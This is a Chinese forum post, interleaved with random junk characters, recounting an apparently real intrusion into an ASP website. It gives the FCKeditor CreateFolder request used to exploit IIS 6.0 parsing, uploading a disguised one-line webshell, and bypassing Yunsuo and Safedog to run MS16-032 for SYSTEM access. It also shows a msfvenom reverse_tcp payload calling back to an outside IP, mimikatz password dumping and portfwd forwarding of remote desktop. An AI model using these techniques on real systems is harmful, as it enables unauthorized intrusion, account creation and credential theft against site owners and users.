|
0 t4 n2 q8 {( c: m* p# }& s 3 H [5 N: X) ?( Y3 R- k1 ]
2 T2 A3 y' D- [5 q* V& F$ k
* O1 U* ~% {' @' K0 T' G7 l& b
| ' H1 w# j, A8 A0 m% m; m0 l
% U4 M0 U2 i9 ^7 z) q
; ]2 c4 E: o) S' f, h! b( g& b一、 利用getwebshell篇
0 y) t! W' ?' f
7 T7 T. z7 K! c首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
5 X) t5 s& C5 r N
. Z, o" {2 u0 a; f4 W# L- R) J
* v: t5 d# R M下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
, Z$ v6 B4 f& ` }) R" ^# Z6 ~# u
* G( V8 v. L& o/ K4 s1 f1 J4 |下面我们构造一个asp目录,如:
$ b- ?" {. Y% ? , a6 s4 @. A" R) b& @" K' u
! F# U5 g/ l3 p# O http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ) @3 |7 Q6 E }" D3 O( M0 A/ e
6 V0 P7 ?2 b9 o7 {( k
- I) w/ w" P6 q7 [# X) L 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
3 G4 h# b8 Z% S7 h/ l
* a7 I( j6 V+ P. Q! g一、 绕过安全狗云锁提权并且加账号
' S/ ~* P- S: P+ U# O7 E. e/ i7 Z* p. p
" _2 _, ^( e- k5 y
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
0 k) L6 l/ F, ^. R. y& R4 C
* ~3 @: A, H7 D" I7 s) n+ j7 B
如图:
& A3 U9 L! J; I# b' o
( a2 u; w& n, G3 ~0 G, r2 b4 i7 c
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
7 [5 D5 J' g: ~, A* h0 ]; D" k3 f
+ a% B3 u! N* G- w9 f j$ Z: L) G一、 利用metasploit
6 v5 K) L% a, s1 |: T6 j, M
1 e4 [6 F+ M; d' [2 u
首先用pentestbox生成一个64位的payload如下命令
# f: D& T1 I0 M, r+ J( W( ]
, k( g' Z& n8 e) l" I6 A7 ZmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
( j- K. n Q6 Z8 u
" I& h( R7 R5 ~& J. L* t8 z
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
- M" S. a' ]7 ? |+ I
A7 O4 t1 h% o
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
Z* R& a/ n( n/ l4 K7 f7 D
8 p: k0 Y) z# y/ a9 U) x6 S2 p
下面我们来做一个监听如下命令:
8 X& L- { C: A
! @- i* G ?" l2 O) y- W% U/ B
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
$ p" I: v7 V# C5 W+ |7 ?! H
 - W4 i% F" P# o9 h
5 D7 b- F+ v2 G | ) x7 G2 [0 {# z H- J M5 ?# f
* U! p$ q$ j y% e# c; G
, @8 h+ n3 e- }1 ]. H+ M& P' f, p
4 C. v6 \" P- X6 _4 u
3 e0 k+ E0 [: G2 T+ L0 z2 D2 `
3 O# f/ Y5 d3 e& ]2 V# g* j
e' |, X5 q6 n! H- j: P# }0 k; p7 [
4 S& z ?. c- I% s3 E0 |+ j
( u$ j- g. S# D( \7 r5 O
8 T: E M$ Z' T7 v1 @4 E* I
% y% F6 q# Q! i) t' L( \- p . v g* ^" g& D9 t {
# M9 D% q( ]. f4 g2 ?2 b
6 ?; J) N( t5 }7 `& B
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06